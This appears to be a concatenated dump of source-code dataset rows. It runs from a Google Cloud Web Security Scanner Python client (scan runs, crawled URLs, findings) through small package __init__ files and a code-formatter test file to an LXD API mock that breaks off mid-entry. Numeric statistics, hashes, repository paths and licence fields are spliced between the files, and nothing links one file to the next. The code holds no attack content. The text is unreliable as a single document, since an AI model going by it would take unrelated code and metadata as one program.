A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanRun` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_scan_runs" not in self._inner_api_calls:
self._inner_api_calls[
"list_scan_runs"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_scan_runs,
default_retry=self._method_configs["ListScanRuns"].retry,
default_timeout=self._method_configs["ListScanRuns"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.ListScanRunsRequest(
parent=parent, page_size=page_size
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_scan_runs"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="scan_runs",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def stop_scan_run(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Stops a ScanRun. The stopped ScanRun is returned.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.scan_run_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]')
>>>
>>> response = client.stop_scan_run(name)
Args:
name (str): Required. The resource name of the ScanRun to be stopped. The name follows the
format of
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanRun` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "stop_scan_run" not in self._inner_api_calls:
self._inner_api_calls[
"stop_scan_run"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.stop_scan_run,
default_retry=self._method_configs["StopScanRun"].retry,
default_timeout=self._method_configs["StopScanRun"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.StopScanRunRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["stop_scan_run"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_crawled_urls(
self,
parent,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
List CrawledUrls under a given ScanRun.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.scan_run_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]')
>>>
>>> # Iterate over all results
>>> for element in client.list_crawled_urls(parent):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_crawled_urls(parent).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): Required. The parent resource name, which should be a scan run resource name in the
format
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}'.
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.websecurityscanner_v1alpha.types.CrawledUrl` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_crawled_urls" not in self._inner_api_calls:
self._inner_api_calls[
"list_crawled_urls"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_crawled_urls,
default_retry=self._method_configs["ListCrawledUrls"].retry,
default_timeout=self._method_configs["ListCrawledUrls"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.ListCrawledUrlsRequest(
parent=parent, page_size=page_size
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_crawled_urls"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="crawled_urls",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def get_finding(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets a Finding.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.finding_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]', '[FINDING]')
>>>
>>> response = client.get_finding(name)
Args:
name (str): Required. The resource name of the Finding to be returned. The name follows the
format of
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}/findings/{findingId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.Finding` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "get_finding" not in self._inner_api_calls:
self._inner_api_calls[
"get_finding"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_finding,
default_retry=self._method_configs["GetFinding"].retry,
default_timeout=self._method_configs["GetFinding"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.GetFindingRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["get_finding"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_findings(
self,
parent,
filter_,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
List Findings under a given ScanRun.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.scan_run_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]')
>>>
>>> # TODO: Initialize `filter_`:
>>> filter_ = ''
>>>
>>> # Iterate over all results
>>> for element in client.list_findings(parent, filter_):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_findings(parent, filter_).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): Required. The parent resource name, which should be a scan run resource name in the
format
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}'.
filter_ (str): Required. The filter expression. The expression must be in the format: .
Supported field: 'finding\_type'. Supported operator: '='.
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.websecurityscanner_v1alpha.types.Finding` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_findings" not in self._inner_api_calls:
self._inner_api_calls[
"list_findings"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_findings,
default_retry=self._method_configs["ListFindings"].retry,
default_timeout=self._method_configs["ListFindings"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.ListFindingsRequest(
parent=parent, filter=filter_, page_size=page_size
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_findings"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="findings",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def list_finding_type_stats(
self,
parent,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
List all FindingTypeStats under a given ScanRun.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.scan_run_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]')
>>>
>>> response = client.list_finding_type_stats(parent)
Args:
parent (str): Required. The parent resource name, which should be a scan run resource name in the
format
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ListFindingTypeStatsResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_finding_type_stats" not in self._inner_api_calls:
self._inner_api_calls[
"list_finding_type_stats"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_finding_type_stats,
default_retry=self._method_configs["ListFindingTypeStats"].retry,
default_timeout=self._method_configs["ListFindingTypeStats"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.ListFindingTypeStatsRequest(parent=parent)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["list_finding_type_stats"](
request, retry=retry, timeout=timeout, metadata=metadata
)
| 42.306586 | 180 | 0.605615 | 5,922 | 55,887 | 5.539007 | 0.07413 | 0.031827 | 0.045973 | 0.032376 | 0.803427 | 0.784007 | 0.752668 | 0.725657 | 0.723279 | 0.708676 | 0 | 0.003882 | 0.317909 | 55,887 | 1,320 | 181 | 42.338636 | 0.856611 | 0.491349 | 0 | 0.574959 | 0 | 0 | 0.071857 | 0.016089 | 0 | 0 | 0 | 0.00303 | 0 | 1 | 0.031301 | false | 0.021417 | 0.037891 | 0 | 0.103789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6abfcab3e3d1169fc3be25b127012e462a2920b4 | 78 | py | Python | tweet_classifier/layers/__init__.py | amr-amr/CrisisTweetMap | 007a32cd23dc0ff5156f6271fbd49198c34077f6 | [
"MIT"
] | 2 | 2020-02-01T19:11:09.000Z | 2020-08-02T13:10:41.000Z | tweet_classifier/layers/__init__.py | mirandrom/CrisisTweetMap | 007a32cd23dc0ff5156f6271fbd49198c34077f6 | [
"MIT"
] | null | null | null | tweet_classifier/layers/__init__.py | mirandrom/CrisisTweetMap | 007a32cd23dc0ff5156f6271fbd49198c34077f6 | [
"MIT"
] | null | null | null | from .cos_classification_layer import *
from .l2_classification_layer import * | 39 | 39 | 0.858974 | 10 | 78 | 6.3 | 0.6 | 0.603175 | 0.793651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014085 | 0.089744 | 78 | 2 | 40 | 39 | 0.873239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
6ac6901f27f404dac95860298f5fb1456707afea | 90 | py | Python | devind_dictionaries/tasks/__init__.py | devind-team/devind-django-dictionaries | 6b2086a15590c968450a5c6fa2a81b4734ee1a81 | [
"MIT"
] | null | null | null | devind_dictionaries/tasks/__init__.py | devind-team/devind-django-dictionaries | 6b2086a15590c968450a5c6fa2a81b4734ee1a81 | [
"MIT"
] | 1 | 2022-03-30T02:44:05.000Z | 2022-03-30T02:44:05.000Z | devind_dictionaries/tasks/__init__.py | devind-team/devind-django-dictionaries | 6b2086a15590c968450a5c6fa2a81b4734ee1a81 | [
"MIT"
] | null | null | null | """Background for async tasks."""
from .update_organizations import update_organizations
| 22.5 | 54 | 0.811111 | 10 | 90 | 7.1 | 0.8 | 0.535211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 90 | 3 | 55 | 30 | 0.876543 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6aedc923f5c7c807baa6dc1ee0ef5657b4030a7e | 647 | py | Python | ddop/newsvendor/__init__.py | AndreasPhilippi/Package | 4ab00d8320f625e3edc191be159e2aa389ed18cf | [
"BSD-3-Clause"
] | 4 | 2021-10-19T12:48:25.000Z | 2022-03-25T10:52:38.000Z | ddop/newsvendor/__init__.py | AndreasPhilippi/Package | 4ab00d8320f625e3edc191be159e2aa389ed18cf | [
"BSD-3-Clause"
] | 1 | 2021-04-20T08:51:38.000Z | 2021-04-20T08:51:38.000Z | ddop/newsvendor/__init__.py | AndreasPhilippi/Package | 4ab00d8320f625e3edc191be159e2aa389ed18cf | [
"BSD-3-Clause"
] | 2 | 2020-07-09T08:26:36.000Z | 2020-07-28T13:51:08.000Z | from ._SampleAverageApproximationNewsvendor import SampleAverageApproximationNewsvendor
from ._WeightedNewsvendor import DecisionTreeWeightedNewsvendor, RandomForestWeightedNewsvendor, \
KNeighborsWeightedNewsvendor, GaussianWeightedNewsvendor
from ._LinearRegressionNewsvendor import LinearRegressionNewsvendor
from ._DeepLearningNewsvendor import DeepLearningNewsvendor
__all__ = ["SampleAverageApproximationNewsvendor", "DecisionTreeWeightedNewsvendor",
"RandomForestWeightedNewsvendor", "KNeighborsWeightedNewsvendor",
"GaussianWeightedNewsvendor", "LinearRegressionNewsvendor",
"DeepLearningNewsvendor"]
| 58.818182 | 98 | 0.848532 | 27 | 647 | 20.037037 | 0.407407 | 0.221811 | 0.325323 | 0.421442 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103555 | 647 | 10 | 99 | 64.7 | 0.932759 | 0 | 0 | 0 | 0 | 0 | 0.306028 | 0.306028 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.444444 | 0 | 0.444444 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
0ab1575ffbcd0e6999e074e01b84ed6020b0efc3 | 4,057 | py | Python | tests/data/cantfit.py | joshbode/black | cea13f498418784e22f8fbd78db3f9240a2bad11 | [
"MIT"
] | null | null | null | tests/data/cantfit.py | joshbode/black | cea13f498418784e22f8fbd78db3f9240a2bad11 | [
"MIT"
] | 1 | 2019-05-26T12:45:44.000Z | 2019-05-26T12:45:44.000Z | tests/data/cantfit.py | joshbode/black | cea13f498418784e22f8fbd78db3f9240a2bad11 | [
"MIT"
] | 1 | 2019-04-10T06:40:09.000Z | 2019-04-10T06:40:09.000Z | # long variable name
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = 0
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = 1 # with a comment
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = [
1, 2, 3
]
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = function()
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = function(
arg1, arg2, arg3
)
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = function(
[1, 2, 3], arg1, [1, 2, 3], arg2, [1, 2, 3], arg3
)
# long function name
normal_name = but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying()
normal_name = but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying(
arg1, arg2, arg3
)
normal_name = but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying(
[1, 2, 3], arg1, [1, 2, 3], arg2, [1, 2, 3], arg3
)
# long arguments
normal_name = normal_function_name(
"but with super long string arguments that on their own exceed the line limit so there's no way it can ever fit",
"eggs with spam and eggs and spam with eggs with spam and eggs and spam with eggs with spam and eggs and spam with eggs",
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it=0,
)
string_variable_name = (
"a string that is waaaaaaaayyyyyyyy too long, even in parens, there's nothing you can do" # noqa
)
for key in """
hostname
port
username
""".split():
if key in self.connect_kwargs:
raise ValueError(err.format(key))
concatenated_strings = "some strings that are" "concatenated implicitly, so if you put them on separate" "lines it will fit"
del concatenated_strings, string_variable_name, normal_function_name, normal_name, need_more_to_make_the_line_long_enough
# output
# long variable name
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = (
0
)
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = (
1
) # with a comment
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = [
1,
2,
3,
]
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = (
function()
)
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = function(
arg1, arg2, arg3
)
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it = function(
[1, 2, 3], arg1, [1, 2, 3], arg2, [1, 2, 3], arg3
)
# long function name
normal_name = (
but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying()
)
normal_name = but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying(
arg1, arg2, arg3
)
normal_name = but_the_function_name_is_now_ridiculously_long_and_it_is_still_super_annoying(
[1, 2, 3], arg1, [1, 2, 3], arg2, [1, 2, 3], arg3
)
# long arguments
normal_name = normal_function_name(
"but with super long string arguments that on their own exceed the line limit so there's no way it can ever fit",
"eggs with spam and eggs and spam with eggs with spam and eggs and spam with eggs with spam and eggs and spam with eggs",
this_is_a_ridiculously_long_name_and_nobody_in_their_right_mind_would_use_one_like_it=0,
)
string_variable_name = "a string that is waaaaaaaayyyyyyyy too long, even in parens, there's nothing you can do" # noqa
for key in """
hostname
port
username
""".split():
if key in self.connect_kwargs:
raise ValueError(err.format(key))
concatenated_strings = (
"some strings that are"
"concatenated implicitly, so if you put them on separate"
"lines it will fit"
)
del (
concatenated_strings,
string_variable_name,
normal_function_name,
normal_name,
need_more_to_make_the_line_long_enough,
)
| 39.77451 | 125 | 0.797141 | 693 | 4,057 | 4.164502 | 0.132756 | 0.11088 | 0.033957 | 0.092169 | 0.997921 | 0.997921 | 0.997921 | 0.997921 | 0.997921 | 0.997921 | 0 | 0.020684 | 0.141977 | 4,057 | 101 | 126 | 40.168317 | 0.808388 | 0.037466 | 0 | 0.477778 | 0 | 0.044444 | 0.228102 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0ab296da71ce268e32f4f01007f1ffcda2cdc2e5 | 43 | py | Python | mvdnet/config/__init__.py | qiank10/MVDNet | d83663df068183d1e606100adb0fc78c35f1141c | [
"Apache-2.0"
] | 51 | 2021-03-05T08:20:27.000Z | 2022-03-30T03:16:19.000Z | mvdnet/config/__init__.py | qiank10/MVDNet | d83663df068183d1e606100adb0fc78c35f1141c | [
"Apache-2.0"
] | 10 | 2021-04-04T09:07:44.000Z | 2021-12-14T09:16:11.000Z | mvdnet/config/__init__.py | qiank10/MVDNet | d83663df068183d1e606100adb0fc78c35f1141c | [
"Apache-2.0"
] | 4 | 2021-03-08T01:49:33.000Z | 2021-12-03T12:46:01.000Z | from .config import get_mvdnet_cfg_defaults | 43 | 43 | 0.906977 | 7 | 43 | 5.142857 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0ac9f177425b7b1ac3cac05338223fbd7a61a227 | 34,795 | py | Python | pylxd/tests/mock_lxd.py | simondeziel/pylxd | d82e4bbf81cb2a932d62179e895c955c489066fd | [
"Apache-2.0"
] | null | null | null | pylxd/tests/mock_lxd.py | simondeziel/pylxd | d82e4bbf81cb2a932d62179e895c955c489066fd | [
"Apache-2.0"
] | null | null | null | pylxd/tests/mock_lxd.py | simondeziel/pylxd | d82e4bbf81cb2a932d62179e895c955c489066fd | [
"Apache-2.0"
] | null | null | null | import json
def instances_POST(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)
def instance_POST(request, context):
context.status_code = 202
if not request.json().get("migration", False):
return {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
else:
return {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
"metadata": {
"metadata": {
"0": "abc",
"1": "def",
"control": "ghi",
}
},
}
def instance_PUT(request, context):
context.status_code = 202
return {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
def instance_DELETE(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)
def images_POST(request, context):
context.status_code = 202
return json.dumps(
{
"type": "async",
"operation": "/1.0/operations/images-create-operation?project=default",
}
)
def image_DELETE(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)
def networks_GET(request, _):
name = request.path.split("/")[-1]
return json.dumps(
{
"type": "sync",
"metadata": {
"config": {
"ipv4.address": "10.80.100.1/24",
"ipv4.nat": "true",
"ipv6.address": "none",
"ipv6.nat": "false",
},
"name": name,
"description": "Network description",
"type": "bridge",
"managed": True,
"used_by": [],
},
}
)
def networks_POST(_, context):
context.status_code = 200
return json.dumps({"type": "sync", "metadata": {}})
def networks_DELETE(_, context):
context.status_code = 202
return json.dumps(
{"type": "sync", "operation": "/1.0/operations/operation-abc?project=default"}
)
def profile_GET(request, context):
name = request.path.split("/")[-1]
return json.dumps(
{
"type": "sync",
"metadata": {
"name": name,
"description": "An description",
"config": {},
"devices": {},
"used_by": [],
},
}
)
def profiles_POST(request, context):
context.status_code = 200
return json.dumps({"type": "sync", "metadata": {}})
def profile_DELETE(request, context):
context.status_code = 200
return json.dumps(
{"type": "sync", "operation": "/1.0/operations/operation-abc?project=default"}
)
def projects_GET(request, context):
name = request.path.split("/")[-1]
return json.dumps(
{
"type": "sync",
"metadata": {
"name": name,
"description": "new project is new",
"config": {
"features.images": "true",
},
"used_by": [],
},
}
)
def projects_POST(request, context):
context.status_code = 200
return json.dumps({"type": "sync", "metadata": {}})
def snapshot_DELETE(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)
RULES = [
# General service endpoints
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"auth": "trusted",
"environment": {
"certificate": "an-pem-cert",
},
"api_extensions": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"auth": "trusted",
"environment": {},
"api_extensions": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0$",
},
# Certificates
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/certificates/an-certificate",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates$",
},
{
"method": "POST",
"url": r"^http://pylxd.test/1.0/certificates$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"certificate": "certificate-content",
"fingerprint": "eaf55b72fc23aa516d709271df9b0116064bf8cfa009cf34c67c33ad32c2320c",
"type": "client",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates/eaf55b72fc23aa516d709271df9b0116064bf8cfa009cf34c67c33ad32c2320c$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"certificate": "certificate-content",
"fingerprint": "an-certificate",
"type": "client",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates/an-certificate$",
},
{
"json": {
"type": "sync",
"metadata": {},
},
"status_code": 202,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/certificates/an-certificate$",
},
# Cluster
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"server_name": "an-member",
"enabled": "true",
"member_config": [
{
"entity": "storage-pool",
"name": "local",
"key": "source",
"value": "",
"description": '"source" property for storage pool "local"',
},
{
"entity": "storage-pool",
"name": "local",
"key": "volatile.initial_source",
"value": "",
"description": '"volatile.initial_source" property for'
' storage pool "local"',
},
],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster$",
},
# Cluster Members
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/certificates/an-member",
"http://pylxd.test/1.0/certificates/nd-member",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster/members$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"server_name": "an-member",
"url": "https://10.1.1.101:8443",
"database": "false",
"status": "Online",
"message": "fully operational",
"architecture": "x86_64",
"description": "AMD Epyc 32c/64t",
"failure_domain": "rack1",
